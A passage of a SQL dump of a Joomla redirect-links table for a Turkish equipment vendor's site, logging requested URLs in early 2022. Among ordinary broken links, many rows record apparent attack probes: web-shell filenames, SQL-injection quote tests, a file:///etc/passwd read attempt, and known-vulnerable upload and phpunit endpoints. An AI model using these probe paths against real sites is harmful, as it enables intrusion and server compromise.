00:00:00',301),(28350,'https://3s-technologies.com.tr/tr/+-+5488599',NULL,'https://3s-technologies.com.tr/tr/+-+5488599','',2,0,'2022-01-27 07:57:09','0000-00-00 00:00:00',301),(28351,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/jvk-detail/askquestion?tmpl=component',NULL,'','',4,0,'2022-01-27 09:02:41','0000-00-00 00:00:00',301),(28352,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/?option=2&view=2&id=2&catid=2&itemid=2',NULL,'','',1,0,'2022-01-27 16:02:13','0000-00-00 00:00:00',301),(28353,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/?option=2\'[0]&view=2&id=2&catid=2&itemid=2',NULL,'','',2,0,'2022-01-27 16:02:15','0000-00-00 00:00:00',301),(28354,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/?option=2&view=2\'[0]&id=2&catid=2&itemid=2',NULL,'','',2,0,'2022-01-27 16:02:21','0000-00-00 00:00:00',301),(28355,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/?option=2&view=2&id=2\'[0]&catid=2&itemid=2',NULL,'','',2,0,'2022-01-27 16:02:29','0000-00-00 00:00:00',301),(28356,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/?option=2&view=2&id=2&catid=2&itemid=2\'[0]',NULL,'','',2,0,'2022-01-27 16:02:55','0000-00-00 00:00:00',301),(28357,'http://3s-technologies.com.tr/tr/mt',NULL,'','',4,0,'2022-01-27 17:07:05','0000-00-00 00:00:00',301),(28358,'http://3s-technologies.com.tr/tr/alfa_data/alfacgiapi',NULL,'','',30,0,'2022-01-27 17:07:06','0000-00-00 00:00:00',301),(28359,'http://3s-technologies.com.tr/tr/wp-content/uploads/2021/12/up.php',NULL,'','',4,0,'2022-01-27 17:07:07','0000-00-00 00:00:00',301),(28360,'http://3s-technologies.com.tr/tr/wp-content/alfa_data/alfacgiapi',NULL,'','',7,0,'2022-01-27 17:07:08','0000-00-00 00:00:00',301),(28361,'http://3s-technologies.com.tr/tr/shells.php',NULL,'','',12,0,'2022-01-27 17:07:09','0000-00-00 00:00:00',301),(28362,'http://3s-technologies.com.tr/tr/wp-admin/alfa.php',NULL,'','',80,0,'2022-01-27 17:07:10','0000-00-00 00:00:00',301),(28363,'http://3s-technologies.com.tr/tr/wp-includes/fw.php',NULL,'','',24,0,'2022-01-27 17:07:12','0000-00-00 00:00:00',301),(28364,'http://3s-technologies.com.tr/tr/wp-content/fw.php',NULL,'','',49,0,'2022-01-27 17:07:13','0000-00-00 00:00:00',301),(28365,'http://3s-technologies.com.tr/tr/wp-admin/fw.php',NULL,'','',42,0,'2022-01-27 17:07:13','0000-00-00 00:00:00',301),(28366,'http://3s-technologies.com.tr/tr/wp-content/uploads/2021/12/fw.php',NULL,'','',4,0,'2022-01-27 17:07:14','0000-00-00 00:00:00',301),(28367,'http://3s-technologies.com.tr/tr/wp-includes/wso.php',NULL,'','',5,0,'2022-01-27 17:07:14','0000-00-00 00:00:00',301),(28368,'http://3s-technologies.com.tr/tr/wp-content/wso.php',NULL,'','',24,0,'2022-01-27 17:07:15','0000-00-00 00:00:00',301),(28369,'http://3s-technologies.com.tr/tr/wp-admin/wso.php',NULL,'','',26,0,'2022-01-27 17:07:16','0000-00-00 00:00:00',301),(28370,'http://3s-technologies.com.tr/tr/wp-22.php',NULL,'','',87,0,'2022-01-27 17:07:17','0000-00-00 00:00:00',301),(28371,'http://3s-technologies.com.tr/tr/fw.php',NULL,'','',224,0,'2022-01-27 17:07:18','0000-00-00 00:00:00',301),(28372,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/temizleme-makineleri/trident-detail/askquestion?tmpl=component',NULL,'','',1,0,'2022-01-29 20:43:23','0000-00-00 00:00:00',301),(28373,'http://3s-technologies.com.tr/tr/defau1t.php',NULL,'','',26,0,'2022-01-30 06:15:14','0000-00-00 00:00:00',301),(28374,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/by,mf_name?language=tr-tr&keyword=',NULL,'','',1,0,'2022-01-30 15:43:29','0000-00-00 00:00:00',301),(28375,'http://3s-technologies.com.tr/tr/elfinder/php/connector.maximal.php',NULL,'','',1,0,'2022-01-30 20:08:54','0000-00-00 00:00:00',301),(28376,'http://3s-technologies.com.tr/tr/elfinder/elfinder.html',NULL,'','',7,0,'2022-01-31 08:39:48','0000-00-00 00:00:00',301),(28377,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/jvk-detail?tmpl=component&print=1',NULL,'','',3,0,'2022-02-01 02:07:00','0000-00-00 00:00:00',301),(28378,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/cs40-detail?tmpl=component&print=1',NULL,'','',2,0,'2022-02-01 03:36:09','0000-00-00 00:00:00',301),(28379,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/kopyas?-gf-12ht_300x300.gif',NULL,'','',1,0,'2022-02-01 21:23:03','0000-00-00 00:00:00',301),(28380,'http://3s-technologies.com.tr/tr/elfinder/connectors/php/connector.php',NULL,'','',4,0,'2022-02-01 22:38:50','0000-00-00 00:00:00',301),(28381,'http://3s-technologies.com.tr/tr/components/general/admin/usercontrol/telerik.web.ui.dialoghandler.aspx',NULL,'','',3,0,'2022-02-02 00:46:50','0000-00-00 00:00:00',301),(28382,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2022-02-02 06:21:15','0000-00-00 00:00:00',301),(28383,'http://3s-technologies.com.tr/tr/wp-content/plugins/ait-csv-import-export/changelog.txt',NULL,'','',1,0,'2022-02-02 18:31:34','0000-00-00 00:00:00',301),(28384,'http://3s-technologies.com.tr/tr/wp-content/plugins/advanced-import/readme.txt',NULL,'','',1,0,'2022-02-02 18:31:34','0000-00-00 00:00:00',301),(28385,'http://3s-technologies.com.tr/tr/wp-content/plugins/iwp-client/readme.txt',NULL,'','',1,0,'2022-02-02 18:31:34','0000-00-00 00:00:00',301),(28386,'http://3s-technologies.com.tr/tr/wp-content/plugins/capabilities-pro/readme.txt',NULL,'','',1,0,'2022-02-02 18:31:34','0000-00-00 00:00:00',301),(28387,'http://3s-technologies.com.tr/tr/wp-content/plugins/ulisting/readme.txt',NULL,'','',1,0,'2022-02-02 18:31:34','0000-00-00 00:00:00',301);
INSERT INTO `fz6t4_redirect_links` VALUES (28388,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-time-capsule/readme.txt',NULL,'','',2,0,'2022-02-02 18:31:35','0000-00-00 00:00:00',301),(28389,'http://3s-technologies.com.tr/tr/wp-content/plugins/angwp/__ updates.txt',NULL,'','',1,0,'2022-02-02 18:31:35','0000-00-00 00:00:00',301),(28390,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-automatic/css/wp-automatic.css',NULL,'','',1,0,'2022-02-02 18:31:35','0000-00-00 00:00:00',301),(28391,'http://3s-technologies.com.tr/tr/wp-content/plugins/capability-manager-enhanced/readme.txt',NULL,'','',1,0,'2022-02-02 18:31:36','0000-00-00 00:00:00',301),(28392,'http://3s-technologies.com.tr/tr/wp-content/plugins/emails-verification-for-woocommerce/readme.txt',NULL,'','',1,0,'2022-02-02 18:31:36','0000-00-00 00:00:00',301),(28393,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-user-extra-fields/js/wpuef-configurator.js',NULL,'','',1,0,'2022-02-02 18:31:36','0000-00-00 00:00:00',301),(28394,'http://3s-technologies.com.tr/tr/wp-content/plugins/superstorefinder-wp/css/ssf-wp-admin.css',NULL,'','',1,0,'2022-02-02 18:31:36','0000-00-00 00:00:00',301),(28395,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce-upload-files/js/wcuf-admin-menu.js',NULL,'','',1,0,'2022-02-02 18:31:37','0000-00-00 00:00:00',301),(28396,'http://3s-technologies.com.tr/tr/wp-content/plugins/e-signature/page-template/default/style.css',NULL,'','',1,0,'2022-02-02 18:31:37','0000-00-00 00:00:00',301),(28397,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-pinterest-automatic/changelog',NULL,'','',1,0,'2022-02-02 18:31:37','0000-00-00 00:00:00',301),(28398,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce-jetpack/readme.txt',NULL,'','',1,0,'2022-02-02 18:31:37','0000-00-00 00:00:00',301),(28399,'http://3s-technologies.com.tr/tr/wp-content/plugins/super-interactive-maps/css/sim-wp-admin.css',NULL,'','',1,0,'2022-02-02 18:31:37','0000-00-00 00:00:00',301),(28400,'http://3s-technologies.com.tr/tr/wp-content/plugins/themegrill-demo-importer/readme.txt',NULL,'','',1,0,'2022-02-02 18:31:38','0000-00-00 00:00:00',301),(28401,'http://3s-technologies.com.tr/tr/wp-content/plugins/image-hover-effects-ultimate/readme.txt',NULL,'','',1,0,'2022-02-02 18:31:38','0000-00-00 00:00:00',301),(28402,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-automatic/changelog',NULL,'','',1,0,'2022-02-02 18:31:38','0000-00-00 00:00:00',301),(28403,'http://3s-technologies.com.tr/tr/wp-content/plugins/shortcode-addons/readme.txt',NULL,'','',1,0,'2022-02-02 18:33:32','0000-00-00 00:00:00',301),(28404,'http://3s-technologies.com.tr/tr/wp-content/plugins/mstore-api/readme.txt',NULL,'','',1,0,'2022-02-02 18:33:32','0000-00-00 00:00:00',301),(28405,'http://3s-technologies.com.tr/tr/wp-content/plugins/superlogoshowcase-wp/css/sls-wp-admin.css',NULL,'','',1,0,'2022-02-02 18:33:33','0000-00-00 00:00:00',301),(28406,'http://3s-technologies.com.tr/tr/wp-content/plugins/dzs-zoomsounds/admin/admin.css',NULL,'','',1,0,'2022-02-02 18:33:33','0000-00-00 00:00:00',301),(28407,'http://3s-technologies.com.tr/tr/wp-content/plugins/vc-tabs/readme.txt',NULL,'','',1,0,'2022-02-02 18:33:34','0000-00-00 00:00:00',301),(28408,'http://3s-technologies.com.tr/tr/elfinder/src/connectors/php/connector.php',NULL,'','',6,0,'2022-02-03 10:48:23','0000-00-00 00:00:00',301),(28409,'http://3s-technologies.com.tr/tr/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php',NULL,'','',8,0,'2022-02-03 14:42:26','0000-00-00 00:00:00',301),(28410,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.6mm-detail',NULL,'','',1,0,'2022-02-04 03:41:48','0000-00-00 00:00:00',301),(28411,'https://3s-technologies.com.tr/tr/x.php',NULL,'','',11,0,'2022-02-04 14:03:10','0000-00-00 00:00:00',301),(28412,'https://3s-technologies.com.tr/tr/wso.php',NULL,'','',13,0,'2022-02-04 14:03:11','0000-00-00 00:00:00',301),(28413,'https://3s-technologies.com.tr/tr/srx.php',NULL,'','',4,0,'2022-02-04 14:03:12','0000-00-00 00:00:00',301),(28414,'https://3s-technologies.com.tr/tr/1337.php',NULL,'','',6,0,'2022-02-04 14:03:13','0000-00-00 00:00:00',301),(28415,'https://3s-technologies.com.tr/tr/ups.php',NULL,'','',7,0,'2022-02-04 14:03:13','0000-00-00 00:00:00',301),(28416,'https://3s-technologies.com.tr/tr/doc.php',NULL,'','',10,0,'2022-02-04 14:03:14','0000-00-00 00:00:00',301),(28417,'https://3s-technologies.com.tr/tr/xx.php',NULL,'','',8,0,'2022-02-04 14:03:15','0000-00-00 00:00:00',301),(28418,'https://3s-technologies.com.tr/tr/xxx.php',NULL,'','',7,0,'2022-02-04 14:03:15','0000-00-00 00:00:00',301),(28419,'https://3s-technologies.com.tr/tr/leaf.php',NULL,'','',8,0,'2022-02-04 14:03:16','0000-00-00 00:00:00',301),(28420,'https://3s-technologies.com.tr/tr/leafmailer2.8.php',NULL,'','',6,0,'2022-02-04 14:03:17','0000-00-00 00:00:00',301),(28421,'https://3s-technologies.com.tr/tr/lf.php',NULL,'','',5,0,'2022-02-04 14:03:17','0000-00-00 00:00:00',301),(28422,'https://3s-technologies.com.tr/tr/alex.php',NULL,'','',5,0,'2022-02-04 14:03:18','0000-00-00 00:00:00',301),(28423,'https://3s-technologies.com.tr/tr/new.php',NULL,'','',6,0,'2022-02-04 14:03:18','0000-00-00 00:00:00',301),(28424,'https://3s-technologies.com.tr/tr/mailer.php',NULL,'','',7,0,'2022-02-04 14:03:19','0000-00-00 00:00:00',301),(28425,'https://3s-technologies.com.tr/tr/marijuana.php',NULL,'','',7,0,'2022-02-04 14:03:20','0000-00-00 00:00:00',301),(28426,'https://3s-technologies.com.tr/tr/gaza.php',NULL,'','',4,0,'2022-02-04 14:03:21','0000-00-00 00:00:00',301),(28427,'https://3s-technologies.com.tr/tr/wp-admin.php',NULL,'','',6,0,'2022-02-04 14:03:21','0000-00-00 00:00:00',301),(28428,'https://3s-technologies.com.tr/tr/wikindex.php',NULL,'','',6,0,'2022-02-04 14:03:24','0000-00-00 00:00:00',301),(28429,'https://3s-technologies.com.tr/tr/wso1.php',NULL,'','',4,0,'2022-02-04 14:03:25','0000-00-00 00:00:00',301),(28430,'https://3s-technologies.com.tr/tr/alfa.php',NULL,'','',14,0,'2022-02-04 14:03:26','0000-00-00 00:00:00',301),(28431,'https://3s-technologies.com.tr/tr/priv8.php',NULL,'','',9,0,'2022-02-04 14:03:27','0000-00-00 00:00:00',301),(28432,'https://3s-technologies.com.tr/tr/bb.php',NULL,'','',5,0,'2022-02-04 14:03:27','0000-00-00 00:00:00',301),(28433,'https://3s-technologies.com.tr/tr/m.php',NULL,'','',8,0,'2022-02-04 14:03:28','0000-00-00 00:00:00',301),(28434,'https://3s-technologies.com.tr/tr/lux.php',NULL,'','',3,0,'2022-02-04 14:03:28','0000-00-00 00:00:00',301),(28435,'https://3s-technologies.com.tr/tr/haxor.php',NULL,'','',4,0,'2022-02-04 14:03:29','0000-00-00 00:00:00',301),(28436,'https://3s-technologies.com.tr/tr/shell.php',NULL,'','',13,0,'2022-02-04 14:03:29','0000-00-00 00:00:00',301),(28437,'https://3s-technologies.com.tr/tr/fox.php',NULL,'','',3,0,'2022-02-04 14:03:30','0000-00-00 00:00:00',301),(28438,'https://3s-technologies.com.tr/tr/1877.php',NULL,'','',3,0,'2022-02-04 14:03:31','0000-00-00 00:00:00',301),(28439,'https://3s-technologies.com.tr/tr/indexx.php',NULL,'','',3,0,'2022-02-04 14:03:33','0000-00-00 00:00:00',301),(28440,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,mf_name/dirdesc/results,1-10?language=tr-tr',NULL,'','',1,0,'2022-02-05 00:47:20','0000-00-00 00:00:00',301),(28441,'http://3s-technologies.com.tr/tr/admin/server/php/index.php?file=tf2rghf.jpg',NULL,'','',9,0,'2022-02-05 04:07:45','0000-00-00 00:00:00',301),(28442,'https://3s-technologies.com.tr/tr/api/geojson?url=file:///etc/passwd',NULL,'https://3s-technologies.com.tr/api/geojson?url=file:///etc/passwd','',1,0,'2022-02-05 16:18:30','0000-00-00 00:00:00',301),(28443,'https://www.3s-technologies.com.tr/tr/ (protected)',NULL,'','',1,0,'2022-02-05 18:27:22','0000-00-00 00:00:00',301),(28444,'http://3s-technologies.com.tr/tr/ckeditor/connectors/php/connector.php',NULL,'','',3,0,'2022-02-06 14:39:06','0000-00-00 00:00:00',301),(28445,'https://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,mf_name/results,1-50?language=tr-tr',NULL,'','',1,0,'2022-02-07 14:43:15','0000-00-00 00:00:00',301),(28446,'http://3s-technologies.com.tr/tr/admin/assets/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',12,0,'2022-02-08 05:34:15','0000-00-00 00:00:00',301),(28447,'http://mail.3s-technologies.com.tr/en/wp-admin/css',NULL,'binance.com','',4,0,'2022-02-09 14:41:45','0000-00-00 00:00:00',301),(28448,'http://3s-technologies.com.tr/tr/admin/assets/global/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',5,0,'2022-02-09 17:00:51','0000-00-00 00:00:00',301),(28449,'http://3s-technologies.com.tr/tr/blog/wp-json/wp/v2/users',NULL,'','',1,0,'2022-02-10 04:15:42','0000-00-00 00:00:00',301),(28450,'http://3s-technologies.com.tr/tr/blog/feed',NULL,'','',1,0,'2022-02-10 04:15:42','0000-00-00 00:00:00',301),(28451,'http://3s-technologies.com.tr/en/2021/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2022-02-10 04:38:06','0000-00-00 00:00:00',301),(28452,'http://3s-technologies.com.tr/tr/editor/connectors/php/connector.php',NULL,'','',1,0,'2022-02-11 05:14:54','0000-00-00 00:00:00',301),(28453,'http://3s-technologies.com.tr/tr/admin/assets/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',5,0,'2022-02-11 13:19:08','0000-00-00 00:00:00',301),(28454,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/dirdesc/results,1-10?language=en-gb',NULL,'','',1,0,'2022-02-12 00:06:48','0000-00-00 00:00:00',301),(28455,'http://mail.3s-technologies.com.tr/en/wp',NULL,'www.google.com','',18,0,'2022-02-13 04:03:55','0000-00-00 00:00:00',301),(28456,'http://mail.3s-technologies.com.tr/en/wordpress',NULL,'www.google.com','',23,0,'2022-02-13 04:04:01','0000-00-00 00:00:00',301),(28457,'http://mail.3s-technologies.com.tr/en/mail',NULL,'www.google.com','',12,0,'2022-02-13 04:04:08','0000-00-00 00:00:00',301),(28458,'http://mail.3s-technologies.com.tr/en/shop',NULL,'www.google.com','',10,0,'2022-02-13 04:04:25','0000-00-00 00:00:00',301),(28459,'http://mail.3s-technologies.com.tr/en/store',NULL,'www.google.com','',10,0,'2022-02-13 04:04:34','0000-00-00 00:00:00',301),(28460,'http://mail.3s-technologies.com.tr/en/forum',NULL,'www.google.com','',10,0,'2022-02-13 04:04:42','0000-00-00 00:00:00',301),(28461,'http://mail.3s-technologies.com.tr/en/blog',NULL,'www.google.com','',17,0,'2022-02-13 04:05:33','0000-00-00 00:00:00',301),(28462,'http://mail.3s-technologies.com.tr/en/new',NULL,'www.google.com','',17,0,'2022-02-13 04:05:41','0000-00-00 00:00:00',301),(28463,'http://mail.3s-technologies.com.tr/en/old',NULL,'www.google.com','',9,0,'2022-02-13 04:05:48','0000-00-00 00:00:00',301),(28464,'http://mail.3s-technologies.com.tr/en/demo',NULL,'www.google.com','',13,0,'2022-02-13 04:05:57','0000-00-00 00:00:00',301),(28465,'http://mail.3s-technologies.com.tr/en/backup',NULL,'www.google.com','',17,0,'2022-02-13 04:06:04','0000-00-00 00:00:00',301),(28466,'http://mail.3s-technologies.com.tr/en/test',NULL,'www.google.com','',8,0,'2022-02-13 04:06:28','0000-00-00 00:00:00',301),(28467,'http://mail.3s-technologies.com.tr/en/home',NULL,'www.google.com','',4,0,'2022-02-13 04:06:36','0000-00-00 00:00:00',301),(28468,'http://mail.3s-technologies.com.tr/en/2020',NULL,'www.google.com','',4,0,'2022-02-13 04:06:43','0000-00-00 00:00:00',301),(28469,'http://mail.3s-technologies.com.tr/en/2019',NULL,'www.google.com','',4,0,'2022-02-13 04:06:52','0000-00-00 00:00:00',301),(28470,'http://mail.3s-technologies.com.tr/en/site',NULL,'www.google.com','',4,0,'2022-02-13 04:06:59','0000-00-00 00:00:00',301),(28471,'http://mail.3s-technologies.com.tr/en/2018',NULL,'www.google.com','',4,0,'2022-02-13 04:07:06','0000-00-00 00:00:00',301),(28472,'http://mail.3s-technologies.com.tr/en/2017',NULL,'www.google.com','',4,0,'2022-02-13 04:07:14','0000-00-00 00:00:00',301),(28473,'http://mail.3s-technologies.com.tr/en/2016',NULL,'www.google.com','',4,0,'2022-02-13 04:07:21','0000-00-00 00:00:00',301),(28474,'http://mail.3s-technologies.com.tr/en/2015',NULL,'www.google.com','',4,0,'2022-02-13 04:07:30','0000-00-00 00:00:00',301),(28475,'http://mail.3s-technologies.com.tr/en/2014',NULL,'www.google.com','',4,0,'2022-02-13 04:07:39','0000-00-00 00:00:00',301),(28476,'http://mail.3s-technologies.com.tr/en/2013',NULL,'www.google.com','',4,0,'2022-02-13 04:07:47','0000-00-00 00:00:00',301),(28477,'http://mail.3s-technologies.com.tr/en/2012',NULL,'www.google.com','',4,0,'2022-02-13 04:07:54','0000-00-00 00:00:00',301),(28478,'http://mail.3s-technologies.com.tr/en/2010',NULL,'www.google.com','',4,0,'2022-02-13 04:08:05','0000-00-00 00:00:00',301),(28479,'http://mail.3s-technologies.com.tr/en/2009',NULL,'www.google.com','',4,0,'2022-02-13 04:08:12','0000-00-00 00:00:00',301),(28480,'http://3s-technologies.com.tr/tr/public/admin/assets/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',4,0,'2022-02-13 05:47:33','0000-00-00 00:00:00',301),(28481,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,mf_name/results,1-10?language=tr-tr&filter_product=',NULL,'','',1,0,'2022-02-14 03:38:43','0000-00-00 00:00:00',301),(28482,'http://3s-technologies.com.tr/tr/radio.php',NULL,'','',521,0,'2022-02-16 10:38:37','0000-00-00 00:00:00',301),(28483,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins-old/index.php?f=/nmrtjoujadutreqj/scrjkuhlebpzmtyo.txt',NULL,'','',1,0,'2022-02-18 04:02:57','0000-00-00 00:00:00',301),(28484,'https://3s-technologies.com.tr/en/wp-content/plugins/background-image-cropper/accesson.php',NULL,'','',6,0,'2022-02-18 07:12:48','0000-00-00 00:00:00',301),(28485,'https://3s-technologies.com.tr/tr/shell4.php',NULL,'','',1,0,'2022-02-18 18:55:30','0000-00-00 00:00:00',301),(28486,'https://3s-technologies.com.tr/tr/ru.php',NULL,'','',1,0,'2022-02-18 18:55:32','0000-00-00 00:00:00',301),(28487,'https://3s-technologies.com.tr/tr/if.php',NULL,'','',2,0,'2022-02-18 18:55:33','0000-00-00 00:00:00',301),(28488,'https://3s-technologies.com.tr/tr/vuln.php',NULL,'','',2,0,'2022-02-18 18:55:33','0000-00-00 00:00:00',301),(28489,'https://3s-technologies.com.tr/tr/fw.php',NULL,'','',5,0,'2022-02-18 18:55:34','0000-00-00 00:00:00',301),(28490,'https://3s-technologies.com.tr/tr/skipper.php',NULL,'','',1,0,'2022-02-18 18:55:34','0000-00-00 00:00:00',301),(28491,'https://3s-technologies.com.tr/tr/skippershell.php',NULL,'','',1,0,'2022-02-18 18:55:35','0000-00-00 00:00:00',301),(28492,'https://3s-technologies.com.tr/tr/tttt.php',NULL,'','',1,0,'2022-02-18 18:55:35','0000-00-00 00:00:00',301),(28493,'https://3s-technologies.com.tr/tr/tshop.php',NULL,'','',1,0,'2022-02-18 18:55:36','0000-00-00 00:00:00',301),(28494,'https://3s-technologies.com.tr/tr/inje3ctor.php',NULL,'','',1,0,'2022-02-18 18:55:38','0000-00-00 00:00:00',301),(28495,'https://3s-technologies.com.tr/tr/saudi.php',NULL,'','',1,0,'2022-02-18 18:55:38','0000-00-00 00:00:00',301),(28496,'https://3s-technologies.com.tr/tr/alfashell.php',NULL,'','',2,0,'2022-02-18 18:55:39','0000-00-00 00:00:00',301),(28497,'https://3s-technologies.com.tr/tr/my_alfa.php',NULL,'','',1,0,'2022-02-18 18:55:39','0000-00-00 00:00:00',301),(28498,'https://3s-technologies.com.tr/tr/uploader.php',NULL,'','',1,0,'2022-02-18 18:55:41','0000-00-00 00:00:00',301),(28499,'https://3s-technologies.com.tr/tr/up.php',NULL,'','',6,0,'2022-02-18 18:55:41','0000-00-00 00:00:00',301),(28500,'https://3s-technologies.com.tr/tr/hacked.php',NULL,'','',1,0,'2022-02-18 18:55:42','0000-00-00 00:00:00',301),(28501,'https://3s-technologies.com.tr/tr/c99.php',NULL,'','',2,0,'2022-02-18 18:55:43','0000-00-00 00:00:00',301),(28502,'https://3s-technologies.com.tr/tr/navir.php',NULL,'','',1,0,'2022-02-18 18:55:44','0000-00-00 00:00:00',301),(28503,'https://3s-technologies.com.tr/tr/cmd13.php',NULL,'','',1,0,'2022-02-18 18:55:45','0000-00-00 00:00:00',301),(28504,'https://3s-technologies.com.tr/tr/inc20k1.php',NULL,'','',1,0,'2022-02-18 18:55:45','0000-00-00 00:00:00',301),(28505,'https://3s-technologies.com.tr/tr/404.php',NULL,'','',6,0,'2022-02-18 18:55:47','0000-00-00 00:00:00',301),(28506,'https://3s-technologies.com.tr/tr/swm.php',NULL,'','',1,0,'2022-02-18 18:55:47','0000-00-00 00:00:00',301),(28507,'https://3s-technologies.com.tr/tr/wp.php',NULL,'','',7,0,'2022-02-18 18:55:48','0000-00-00 00:00:00',301),(28508,'https://3s-technologies.com.tr/tr/shx.php',NULL,'','',4,0,'2022-02-18 18:55:50','0000-00-00 00:00:00',301),(28509,'https://3s-technologies.com.tr/tr/ws.php',NULL,'','',6,0,'2022-02-18 18:55:50','0000-00-00 00:00:00',301),(28510,'https://3s-technologies.com.tr/tr/edit-form.php',NULL,'','',2,0,'2022-02-18 18:55:51','0000-00-00 00:00:00',301),(28511,'https://3s-technologies.com.tr/tr/leafmailer.php',NULL,'','',2,0,'2022-02-18 18:55:52','0000-00-00 00:00:00',301),(28512,'https://3s-technologies.com.tr/tr/owl.php',NULL,'','',2,0,'2022-02-18 18:55:56','0000-00-00 00:00:00',301),(28513,'https://3s-technologies.com.tr/tr/0.php',NULL,'','',5,0,'2022-02-18 18:55:57','0000-00-00 00:00:00',301),(28514,'https://3s-technologies.com.tr/tr/alexus.php',NULL,'','',4,0,'2022-02-18 18:55:57','0000-00-00 00:00:00',301),(28515,'https://3s-technologies.com.tr/tr/z.php',NULL,'','',5,0,'2022-02-18 18:55:58','0000-00-00 00:00:00',301),(28516,'https://3s-technologies.com.tr/tr/send.php',NULL,'','',4,0,'2022-02-18 18:55:58','0000-00-00 00:00:00',301),(28517,'https://3s-technologies.com.tr/en/cache/accesson0.php',NULL,'','',5,0,'2022-02-19 04:10:49','0000-00-00 00:00:00',301),(28518,'http://3s-technologies.com.tr/tr/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',12,0,'2022-02-19 05:34:01','0000-00-00 00:00:00',301),(28519,'http://3s-technologies.com.tr/tr/assets/server/php/index.php?file=tf2rghf.jpg',NULL,'','',3,0,'2022-02-20 12:43:13','0000-00-00 00:00:00',301),(28520,'https://3s-technologies.com.tr/en/wp-content/plugins/background-image-cropper/image/ico/accesson.php',NULL,'','',5,0,'2022-02-21 00:55:22','0000-00-00 00:00:00',301),(28521,'https://3s-technologies.com.tr/en/accesson0.php',NULL,'','',5,0,'2022-02-21 17:37:19','0000-00-00 00:00:00',301),(28522,'https://3s-technologies.com.tr/en/cache/accesson.php',NULL,'','',6,0,'2022-02-22 01:17:59','0000-00-00 00:00:00',301),(28523,'http://3s-technologies.com.tr/tr/assets/admin/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',6,0,'2022-02-22 06:04:50','0000-00-00 00:00:00',301),(28524,'http://3s-technologies.com.tr/en/contacts/en/contacts',NULL,'http://3s-technologies.com.tr/en/contacts','',5,0,'2022-02-23 02:05:54','0000-00-00 00:00:00',301),(28525,'http://3s-technologies.com.tr/tr/contacts/en/contacts',NULL,'http://3s-technologies.com.tr/tr/contacts/en/contacts','',12,0,'2022-02-23 02:05:54','0000-00-00 00:00:00',301),(28526,'http://mail.3s-technologies.com.tr/tr/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',4,0,'2022-02-23 08:59:00','0000-00-00 00:00:00',301),(28527,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/spartan-8s-8d-detail/askquestion?tmpl=component',NULL,'','',5,0,'2022-02-23 16:45:24','0000-00-00 00:00:00',301),(28528,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/dirdesc?language=tr-tr&keyword=',NULL,'','',4,0,'2022-02-24 02:12:11','0000-00-00 00:00:00',301),(28529,'http://3s-technologies.com.tr/tr/assets/backend/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',4,0,'2022-02-24 04:25:34','0000-00-00 00:00:00',301),(28530,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/lazer-markalama/by,product_sku?language=tr-tr&keyword=',NULL,'','',1,0,'2022-02-24 12:53:14','0000-00-00 00:00:00',301),(28531,'https://3s-technologies.com.tr/en/assets/images/accesson0.php',NULL,'','',5,0,'2022-02-24 16:16:58','0000-00-00 00:00:00',301),(28532,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/rg131-detail?tmpl=component&print=1',NULL,'','',1,0,'2022-02-24 16:42:53','0000-00-00 00:00:00',301),(28533,'https://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,category_name?language=en-gb',NULL,'','',2,0,'2022-02-25 15:26:10','0000-00-00 00:00:00',301),(28534,'http://3s-technologies.com.tr/tr/theme/assets/global/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',5,0,'2022-02-25 16:29:17','0000-00-00 00:00:00',301),(28535,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/ddm-novastar/smd-fä±rä±n?language=tr-tr&keyword=',NULL,'','',3,0,'2022-02-26 11:23:05','0000-00-00 00:00:00',301),(28536,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/spartan-8s-8d-detail?tmpl=component&print=1',NULL,'','',2,0,'2022-02-26 15:51:12','0000-00-00 00:00:00',301),(28537,'https://3s-technologies.com.tr/tr/a.php',NULL,'','',8,0,'2022-02-27 03:09:11','0000-00-00 